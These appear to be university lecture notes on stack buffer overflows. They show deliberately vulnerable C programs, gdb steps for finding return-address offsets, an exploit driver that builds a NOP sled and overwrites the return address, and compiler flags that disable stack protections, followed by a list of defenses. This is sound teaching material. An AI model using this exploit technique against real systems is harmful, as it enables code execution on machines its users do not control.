CSE 374, Lecture 20: Buffer Overflows

The classic guide to "stack smashing"/buffer overflows - note that this is very old now so some of it won't work exactly like the guide, but it's a great reference.

What is a buffer overflow?

    void echo() {
      char buf[8];
      gets(buf);
      puts(buf);
    }

gets does not do any bounds checking. Any input longer than 7 characters will write past the end of buf.

Stack layout

As a refresher, remember the layout of a "frame" of the stack (from the gdb lecture):

     --------------------
    |                    |
    |       local        |
    |     variables      |
    |                    |
    |--------------------|
    | prev frame pointer |
    |--------------------|
    |   return address   |
    |--------------------|
    |                    |
    | function arguments |
    |                    |
     --------------------

A "stack frame" is a section of the stack that is set aside for each function call. It is pushed onto the stack when the function is called and popped off when the function returns.

This picture of the stack shows us an interesting situation: if we have a buffer overflow of a local variable that writes over its normally-allocated space, it might overwrite the stack frame's "previous frame pointer" and "code return address"!

First exploit

To demonstrate how we could exploit buffer overflows, we'll use the following toy program:

    void function(int a, int b, int c) {
      char buffer1[5];
      uintptr_t ret;

      ret = buffer1 + 0; // fill this in
      *((uintptr_t*)ret) += 0; // fill this in
    }

    int main(int argc, char** argv) {
      int x;

      x = 0;
      function(1,2,3);
      x = 1;  // skip this line
      printf("%d\n",x);

      return 0;
    }

We want to try skipping the line "x = 1;" in the main function via modifying function's return address.

We need to identify where the return address is in relation to the local variable buffer1.
We need to figure out how many bytes the actual compiled C instruction "x=1;" takes, so that we can increment by that many bytes.

We will figure out these two steps using gdb - these commands are helpful:

    break function    // break at the start of function
    x buffer1         // prints the location of buffer1
    info frame        // "rip" will hold the location of the return address
    print <rip-location> - <buffer1-location>
                      // prints the number of bytes between buffer1 and rip

         --- now we have the first value to fill in (24 on my computer) ---

    disassemble main  // shows the machine code and how many bytes each instruction takes up.
                      // We identify the line that calls function, then see that the next
                      // instruction moves 1 into x. That instruction takes 7 bytes, so we
                      // have now found the second number!

This is a toy example of course - not like the real world! The actual objective of a buffer overflow like this is to start a shell (ie bash) from the C program by executing another C program. We can do this by storing the compiled code to run a shell as a string (Google for "buffer overflow shellcode") and then overwriting the return address such that it points to our controlled string.

Second exploit

Consider this victim program with a buffer overflow weakness because of an unbounded strcpy:

    int bar(char *arg, char *out) {
      strcpy(out, arg);
      return 0;
    }

    void foo(char *argv[]) {
      char buf[256];
      bar(argv[1], buf);
    }

    int main(int argc, char *argv[]) {
      if (argc != 2) {
        fprintf(stderr, "target1: argc != 2\n");
        exit(1);
      }
      foo(argv);
      return 0;
    }

What do we need to do to exploit this program and get it to run a shell? We can use gdb as before to find these things.

We need to pass in the attack code + a value to override the return address as the argument to main.
We need to know the size of the buffer and the offset between the start of the buffer and foo's return address.
We need to know the address of the attack code (which will now be stored in "buf") so that we can override the return address with that address.

In order to accomplish this, we'll write another program that calls the victim program and passes it the right argument. This makes it easier to generate the proper string to give as argument.

    int main(void) {
      char *args[3];
      char *env[1];  // don't worry about env variables, we'll set them to null

      args[0] = "/tmp/target";
      args[2] = NULL;
      env[0] = NULL;

      // We used gdb to determine that there are 264 bytes between
      // buf and the return address, so we malloc space for 264
      // characters plus one for the null terminator.
      args[1] = (char*) malloc(sizeof(char)*265);

      // We set the memory to a value so that we ensure that there
      // is no null-termination in this string before the final
      // character. 0x90 is also a byte that means "no-op" in terms
      // of byte instructions.
      memset(args[1], 0x90, 264);

      // Null-terminate the string.
      args[1][264] = '\0';

      // Add in the attack code to the front of the argument.
      memcpy(args[1], shellcode, strlen(shellcode));

      // Store the address of the buf at the appropriate location
      // in the string (we determined the address using gdb.
      *(uintptr_t*)(args[1] + 264) = 0x7fffffffdb90;

      // Actually call the victim program.
      execve("/tmp/target", args, env);
    }

Note that because there have been a lot of improvements in the C compiler in the last 20 years, the original buffer overflow attacks like this one won't work by default - we need to disable the defenses listed below to demonstrate it. Include "-fno-stack-protector -z execstack" when compiling both the target program and the exploit to disable the protections.

Defenses against buffer overflows

Avoid vulnerabilities in the first place.
- Use library functions that limit string lengths
- fgets instead of gets
- strncpy instead of strcpy
- %ns instead of %s in scanf
System-level protections
- Make stack non-executable
- Have compiler insert âstack canariesâ
- Put a special value between buffer and return address
- Check for corruption before leaving function